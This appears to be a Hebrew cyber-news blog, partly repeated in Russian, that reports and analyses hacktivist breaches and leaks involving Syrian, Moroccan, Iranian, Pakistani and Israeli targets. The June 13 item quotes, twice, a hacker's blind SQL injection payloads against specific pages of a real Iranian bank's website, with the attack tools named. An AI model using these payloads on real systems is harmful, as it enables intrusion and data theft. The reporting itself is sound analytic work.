סדרת מתקפות של "אנונימוס" נגד הממשל הסורי

בשעות אחה"צ של ה-25 באוקטובר פורסם כי עלה בידי פעילים מ"אנונימוס" לפרוץ לאתר הממשלתי הסורי של משרד הפטנטים ולהדליף משם מסמכים שונים.

ההודעה הפנתה לכתבה בנושא אשר כללה קישור לנטילת אחריות מה-24 באוקטובר ובה הפניה לקובץ המסמכים שהודלפו בארוע (זמן מה לאחר הצבתו הוסר ככל הנראה הקובץ. לפי שעה לא ניתן להורידו מכתובת זו). ההודעה כללה בסופה את המסר;

Anonymous: 4
Al-Assad : 0
פעילות זו מצטרפת לפריצה של אלו לאתר ממשלתי סורי אחר יום קודם לכן במתכונת זהה; ב-24 באוקטובר התפרסמה הודעת טוויטר אשר גם היא הפנתה לכתבה אשר הפנתה לנטילת אחריות מיום קודם בדבר פריצה לאתר הממשלתי של הרשות העליונה למחקר מדעי בסוריה (אשר היוותה את הנצחון השלישי של "אנונימוס"). גם זו כללה הפניה לקובץ שהודלף אשר גם זה אינו זמין עוד.
במהלך ה-25 באוקטובר פורסמה קריאה לתקוף את כלל אתרי ממשלת סוריה בהמשך לראיון שפורסם יום קודם לכן עם מי שטוען כי הוא אחד מהמעורבים בתקיפות אשר סיפר כי באלו מעורבים שלושה וכי פעולת הפריצה ארכה מספר שעות בלבד.
אלו באים לאחר שני הארועים הראשונים בסדרה אשר בוצעו במהלך חודש ספטמבר; פריצה לאתרי ממשל סוריים בתחילת החודש וכן הדלפה לכאורה של פרטי חברים ב"צבא הסורי האלקטרוני" בסופו.

"אנונימוס" תקפו אתר ממשלה במרוקו במחאה על מעצר זוג שהתנשק

בשעות אחה"צ של ה-17 באוקטובר פרסמו פעילים המזוהים עם "אנונימוס" הודעת טוויטר שהפנתה לנטילת אחריות ובה נטען כי עלה בידם לפרוץ לאתר מחלקת המים במשרד האנרגיה, המכרות, המים והסביבה במרוקו, זאת בהודעה שכללה חשיפת מידע רב מבסיס הנתונים של אתר זה. עוד נטען בה כי הפעולה בוצעה כנקמה על מעצר שני צעירים מקומיים ב-3 באוקטובר לאחר שהעלו תמונה לפייסבוק בה הם מתנשקים מחוץ לבית הספר שלהם. עוד נמסר בה כי משפטם יערך ב-22 בנובמבר וכי עד אז "אנונימוס" יצפה ויהיה מוכן להגיב.

ההודעה כוללת אזהרה מפורשת לשלטונות מרוקו;
"We intend to humiliate the Moroccan government the way that these youths have been humiliated. We intend to expose the Moroccan government, the way they have exposed the private lives of these young teenagers. No matter what the eventual outcome of this case these young people will bear some burden from it, probably for the rest of their lives."
כמו גם;
"Continue down this road and we will rip through your government servers, leaking and deleting as we go. None of your systems will be safe. Our actions represent merely an opening volley, a warning."
עוד מציינת ההודעה את השלל שהעלות בעת הפריצה לאתר;

"It seemed that the best place to sail in search of leaks would be the Moroccan Ministry of Energy, Mines, Water and Environment, specifically the Department of Water, What we got instead was a niagarous flood of data. We are sharing some of it with you here. Personnel files, bank transfer details, passwords, there is much, much more.. This is merely a taste, we are holding back, hoping that leniency will be shown and our continued efforts will be unnecessary."

עוד קודם לכן התקיימה הפגנה ב-12 באוקטובר בחזית הפרלמנט המרוקני במהלכה התחבקו והתנשקו עשרות מפגינים במחאה על המעצר.

"אנונימוס" נגד ממשלות ברחבי העולם

ב-16 באוקטובר דיווחו פעילים מ"אנונימוס" כי עלה בידם לפרוץ לשרתי משרד הכלכלה הפולני במסגרת מבצע OpGoldenDawn נגד התנועה הנאו-נאצית היוונית "השחר הזהוב". מידע משרתים אלו הופץ באינטרנט בקובץ מכווץ בן 384 MB הכולל מאות רבות של מסמכי ממשל שונים. חלק מהמסמכים, ובכלל זה צילומי דרכונים, הועלו כתמונות לאתר Imgur. ההודעה מסרה כי במהלך סוף השבוע הקרוב יפורסמו תכתובות דוא"ל של ממשלת איטליה.

יומיים קודם לכן הודלפו אלפי מסמכים ממשרד החוץ היווני וכן מ"הארגון לבטחון ושיתוף פעולה באירופה" (OSCE). אלו הופצו בשני קבצים (1,2) מכווצים בנפח כחצי ג'יגה, המכילים כ-3,700 מסמכים. נמסר כי משרד החוץ היווני אכן הודה בדבר הפריצה.

נראה כי הטעם למבצע מצוי בפסקה הראשונה של הודעה זו;

"We all know how bad the situation in Greece today is, alongside the economic mayhem the government allowed nazisfrom Golden Dawn to sabotage the integrity of entire country and european principles of freedom and moral."

בתוך כך נודע כי פעילי "אנונימוס" בוונצואלה תקפו וחדרו למספרי אתרי אינטרנט ממשלתיים וצבאיים במדינה, ללא קשר למבצע האמור, אך גם כאן כמחאה נגד הממשלה;

"The attacks represent a form of protest against the country’s government."

הודעה שקרית על פריצה לשרת הדואר של משרד הנשיאות הסורי

בתאריך 24 אוגוסט פורסמה הודעה מטעם האקר מרוקני ובה נטען כי הוא פרץ לכאורה לשרת הדואר של המשרד לענייני נשיאות בסוריה והדליף משם כ-80 כתובות דוא"ל וסיסמאות. אולם, רשימה זו התפרסמה בשלמותה בפייסבוק בתחילת דצמבר 2012 ואף עוד קודם לכן בפברואר אותה השנה.

ביולי 2012 החל ויקיליקס להדליף מסמכים ותכתובות דוא"ל רבות ממשרדי ממשלה סוריים שונים, זאת במסגרת Syria Files. במסגרת זו הודלפו למעלה מ-16 אלף מסמכים ממשרד זה בספטמבר אותה שנה.

כמו במקרים רבים בעבר, נעשה שימוש במרחב הקיברנטי ליצירת לוחמה פסיכולוגית אשר ערכה רב לפעמים מההתקפה המקוונת שבוצעה בפועל אם בכלל; לא מן הנמנע כי הרשימה שהתפרסמה בזמנו היא מקורית והושגה באמצעות פריצה לשרתי משרד הנשיאות הסורית, אולם הדבר לא מונע מבעלי עניין למחזר ידיעות ישנות ולהפיצן בתקווה כי אלו יזכו לחיים חדשים מבלי שתבדק אמינותן ועדכניותן.

"הצבא הסורי האלקטרוני" מדליף פרטי גישה של שני בכירים בחברת Viber

בהמשך לידיעה בדבר פריצה שביצעו חברי "הצבא הסורי האלקטרוני" לאתר התמיכה של חברת Viber, נודעו ב-26 ביולי פרטים נוספים על אודות פריצה זו.

בהודעה שפורסמה בשעה 17:38 נחשפו פרטי הדוא"ל של Talmon Marco, מייסד החברה;

כעבור דקה פורסמה הודעה נוספת ובה פרטי הדוא"ל של Stas Goshtein, מנהל מערכות המידע בחברה;

לפיכך, נראה כי הפריצה שבוצעה לחברת Viber היתה נרחבת וכללה לא רק משתמשי החברה שנעזרו באתר התמיכה שלה, אלא גם בכירים בחברה עצמה.

פריצה של "הצבא הסורי האלקטרוני" לאתר התמיכה של Viber

בצהרי ה-23 ביולי התפרסמה הודעה באתר האינטרנט של "הצבא הסורי האלקטרוני" לפיה אנשיו פרצו לאתר התמיכה של חברת Viber.

ההודעה הפנתה לעמוד ובו עדות להשחתת האתר שנפרץ כמו גם הפניה לצילום מסך מטבלת הנתונים שנפרצה וכן פרסום פרטיהם (מספר טלפון, כתובת דוא"ל ושם מלא) של 11 המוגדרים כמנהלי מערכת (Administrators) באתר. מרביתם בעלי שמות ישראליים.

בהמשך היום פורסמה הודעה בערוץ הטוויטר של קבוצה זו ובה אזהרה למשתמשי התוכנה;

כמו גם הודעה נוספת יום למחרת המופנית להנהלת החברה;

לפי שעה לא דווח על ארוע חריג ברשתות החברתיות השונות של חברת Viber ובכלל זה; +Facebook, Twitter, Google. ההודעות האחרונות בהן בנות שבוע ויותר.

האקרים ישראליים מדליפים מאתר ממשלתי פקיסטאני

בשעות הערב של ה-17 ביולי פורסמה הודעה מטעם ההאקרים הישראלים Dog_FtS ו-Zeus israel בדבר פריצה שביצעו לאתר ממשלתי בפקיסטאן – Higher Education Commission Pakistan. השניים פרסמו את דבר הפריצה בעמוד יעודי לשם כך הכולל 362 רשומות אשר מקורן כלל הנראה באתר שנפרץ.

אלו כוללות שם משתמש, דוא"ל, מספר טלפון, שם משתמש באתר, סיסמא, תאריך יצירת הרשומה ותאריך עדכונה. הרשומה המאוחרת ביותר נוצרה בתאריך 7 ביוני 2013 והמוקדמת ביותר בתאריך 24 ינואר 2009.

אין זו הפעם הראשונה בה האקרים ישראליים פועלים נגד יעדים בפקיסטאן; ב-22 במאי נחשפה לכאורה זהותו של האקר פאקסיטאני על ידי קבוצת האקרים ישראלית אשר פרצו חודש וחצי קודם לכן לאתר אחר בפקיסטאן, אף הוא מתחום החינוך והמדע והשחתת שניים אחרים על ידי אותה קבוצה.

Вечером 17 июля группа израильских хакеров под названием  "Zeus Israel dog_FTS" опубликовала заявление о взломе пакистанского правительственного сайта – "Higher Education Commission Pakistan". Они опубликовали данные 362 пользователей данного сайта. Эти данные включают телефонные номера, пароли и логины пользователей.

Это не первый раз, когда израильские хакеры действуют против пакистанских сайтов; 22 мая они разоблачили личность пакистанского коллеги после того, как атаковали один из пакистанских сайтов.

פריצה של האקר ישראלי לאתר איראני

בהמשך לעליה בהיקף הפעילות של האקרים ישראליים בעת האחרונה, פרסם בשעות הערב של ה-23 יוני ההאקר Zeus Israel הודעה בדבר פריצה אשר ביצע לאתר איראני בשם Vista.

ההודעה כוללת פרטי 2,041 כתובות מייל וסיסמאות מוצפנות אשר מקורן ככל הנראה באתר שנפרץ. אלו מסודרות אלפאבתית לפי שם המשתמש בכתובת המייל, על פי רוב שמות איראניים.

מרבית הכתובות בעלות סיומת Gmail.com, Yahoo.com. בנוסף אותרו מספר כתובות איראניות דוגמת IRANCELL.IR, chmail.ir, aspek.ir, mosavibahraini.ir, mihanmail.ir ואחרות.

לא מן הנמנע כי רשימה זו היא של כתובות מייל וסיסמאות גישה אותם הזינו המשתמשים בעת רישום לאתר שנפרץ. כלומר, לא בהכרח סיסמאות גישה לחשבונות המייל. כבעבר, יעידו על כך כתובות מייל הנראות שגויות או לא מקובלות (גם אם כמותן זניחה בהשוואה לכתובות האמת), לדוגמא; info.farsibiz@gmali.com. לצד עשרות כתובות אשר בהן מופיע www בתחילת כתובת המייל – www.afarin@yahoo.com.

ir,

האקר ישראלי טוען כי פרץ לאתר בנק איראני

ב-13 ביוני פרסם ההאקר הישראלי Amenefus הודעה ובה פנה ל-An0nGhost ולתושבי איראן בטענה כי עלה בידו לפרוץ לאתר של Bank Melli Iran. להוכחת דבריו הוא פרסם את הפרטים הבאים;

Target; wWw.BMi.iR (Bank Melli Iran)
Look kids(=An0nGhost). this is how to SQLi a bank in Iran.[!]


Blind SQLi 1;
http://bmi.ir/fa/objectslist.aspx
————————————————————————————
|GET input tid was set to -1' or 67 = '65                                          |
|code: POST /fa/objectslist.aspx?cid=5&smnuid=34&tid=-1%27%20or%2067%20%3d%20%2765 |
————————————————————————————

Blind SQLi 2;
http://bmi.ir/fa/publishlist.aspx
————————————————————————————
|POST input ctl00%24Footer2%24ImageButtonRSSFeed was set to -1' or 36 = '34        |
|POST /fa/publishlist.aspx?cid=0&page=2                                            |
————————————————————————————

succeed with SQLMap, nMap, Havij, BlindCat.

13 июня, израильский хакер, известный как "Amenefus", опубликовал заявление об успешном взломе сайта иранского банка " Bank Melli Iran". Для подтверждения он опубликовал следующие данные:

Target; wWw.BMi.iR (BankMelliIran)

Look kids(=An0nGhost). this is how to SQLi a bank in Iran.[!]

Blind SQLi 1;

http://bmi.ir/fa/objectslist.aspx

————————————————————————————

|GET input tid was set to -1′ or 67 = '65                                          |

|code: POST /fa/objectslist.aspx?cid=5&smnuid=34&tid=-1%27%20or%2067%20%3d%20%2765 |

————————————————————————————

Blind SQLi 2;

http://bmi.ir/fa/publishlist.aspx

————————————————————————————

|POST input ctl00%24Footer2%24ImageButtonRSSFeed was set to -1′ or 36 = '34        |

|POST /fa/publishlist.aspx?cid=0&page=2                                            |

————————————————————————————

succeed with SQLMap, nMap, Havij, BlindCat.

הודעות על התקפות תוניסאיות נגד אתרי ממשל ועסקים בישראל

בשעות האחרונות נרשמת פעילות ערה בקרב גורמים תוניסאים המזוהים עם "אנונימוס" תוך התייחסות להתקפות מסוג מניעת שירות מבוזרת (DDoS) ופריצות למאגרי מידע בישראל.

בין המטרות אשר הוגדרו כיעדים לתקיפה ניתן למנות בעיקר את אתרי בית הנשיא ומשרד החוץ;

בעת בדיקה, אכן נרשמו זמני תגובה איטיים משרת אתר בית הנשיא;

בנוסף דווח בקבוצות השונות של גורמים אלו על הדלפת קבצים ממשרדי ממשלה וחברות שונות;

אלו שחררו קבצים (הפניות אליהם אוגדו בעמוד אחד) אשר נטען כי הם מכילים חומרים מסווגים שהודלפו מגופי ממשל ובנקאות בישראל. מבדיקה שערכתי בהם עולים הפרטים הבאים;

  • קובץ ובו טענה ל-50 בסיסי נתונים של אתרים ישראליים שנמחקו.
  • משרד הבריאות – קובץ הנושא את התאריך 12 דצמבר 2008 ואת הכתובת newsletter@health.gov.il. ככל הנראה רשימת דיוור ישנה של המשרד.
  • בנק הפועלים – קובץ טקסט באנגלית של מסמך אשר נראה כסקירה שנתית של בנק ישראל (למרות הטענה כי מדובר ב-"bank israel Confidential business transactions").
  • משטרת ישראל – קובץ ובו כ-70 רשומות, אשר נראה כי מקורן בשתי קבוצות שונות; האחד מקורו ב-XhàckerTN ובו טבלה אשר בין השדות בה קיימים גם  circle_score, ,content_fr, role_fr pic דבר אשר יכול להעיד כי מקור הטבלה באתר משחקים. החלק השני בקובץ נושא בראשו את השם "Kosova Hacker's Security". בשני המקרים לא אותרו שמות ישראליים וגם כתובות המייל אינן נראות אמינות.
  • Israel Army – נראה על פניו כי זהו אתר פרטי ובו מידע על צה"ל ואפשרויות השירות בו. גם כאן רשימה ארוכה אשר נראית כאילו נוצרה בצורה ממוכנת או לפחות אינה קשורה כלל באוכלוסיה בישראל.
  • דואר ישראל – קובץ אחד הכולל כ-730 כתובות מייל של ישראלים וככל הנראה סיסמאות מוצפנות. אולם כבעבר, נראה כי אלו שייכות למאגר אשר נפרץ ואינן בהכרח סיסמאות גישה לכתובות מייל אלו. עדות לכך הן כתובות בדויות דוגמת iusgiujdruigjeuirghuiehg@UIjeuijgiuejrgiojegioe.com, a.daf@a.net. עם זאת, הרשימה כוללת כתובות מייל רבות של ישראלים ובכלל 5 בעלות סיומת gov.il. הקובץ השני כולל רשומות מערכת.
  • AVG –  קובץ ובו כתובות מייל רבות אשר גם הן נראות כמעשה ידי מחשב; b.r.ia.nb.es.t.wi.s.h.01@gmail.com, xhubfijtif@ehbatw.com, sfrmeqyrlm@ktqmch.com, או לפחות לא כאלו השייכות לישראלים.
  • דלק אלון – מסמך אשר נראה כתרגום לאנגלית של קורות חיים ובסופו רשימה ארוכה  של כתובות מייל במתכונת אשר צויינה לעיל.
  • מוסד – בדיקת מספר רשומות איתרה אותם בצורה עוקבת באחד משני הקבצים אשר נדונו בידיעה שלי מה-23 במרץ בדבר ההדלפה שלא היתה מאתר המוסד.
  • 5,000 כתובות מייל של ישראלים – רשימה ארוכה ובה כתובות מייל רבות של ישראלים.

לסיכום, בשעות אחר הצהריים של ה-13 ביוני אותרה פעילות ערה של האקרים תוניסאים המזוהים עם "אנונימוס" ליצירת מתקפות מקוונות נגד אתרי ממשל ועסקים בישראל. במסגרת זו פורסמו קבצים אשר נטען כי הודלפו מאתרי ממשל בישראל, בפועל הוכח כי במרבית המקרים מדובר בלוחמה פסיכולגית.

פריצה לאתר אוניברסיטה בטורקיה

בתאריך ה-6 ביוני פורסמה ידיעה בדבר פריצה לאתר אוניברסיטה בטורקיה אשר בוצעה לכאורה על ידי China Blue Army ו-Group Hp-Hack במסגרת מבצע OpTurkey במחאה על היחס השלטון למפגינים.

ההודעה כוללת כ-30 רשומות, ככל הנראה של סטודנטים זרים הלומדים באוניברסיטה. רשומות אלה כוללות שם פרטי, שם משפחה, שיוך אקדמי, דוא"ל ומספר טלפון.

6 июня было опубликовано заявление о взломе сайта турецкого университета, который был осуществлен хакерами из China Blue Army  и Group Hp-Hack  в рамках операции OPTurkey в знак протеста против отношения турецких властей к демонстрантам.

Были взломаны данные 30-ти пользователей, скорее всего иностранных студентов, которые учатся в данном университете. Также были опубликованы имена, фамилии, адреса эл. почты  и телефонные номера данных пользователей.

פריצה של האקרים ישראליים לספק אינטרנט סורי

בשעות הבוקר של ה-9 ביוני פורסמה הודעה מטעם קבוצת ההאקרים הישראלית Israeli Elite Force בדבר פריצה שבוצעה מטעמם למחשבי ספק אינטרנט סורי והדלפת נתונים ממנו.

ההודעה כוללת קישור לקובץ ממנו עולה כי בוצעה פריצה לשרתי ספק האינטרנט הסורי AYA וכן קישור לקובץ ובו נתוני ההדלפה מפריצה זו וציון פרטי השרת. קובץ ההדלפה כולל 17 קבצים מבסיס הנתונים של האתר.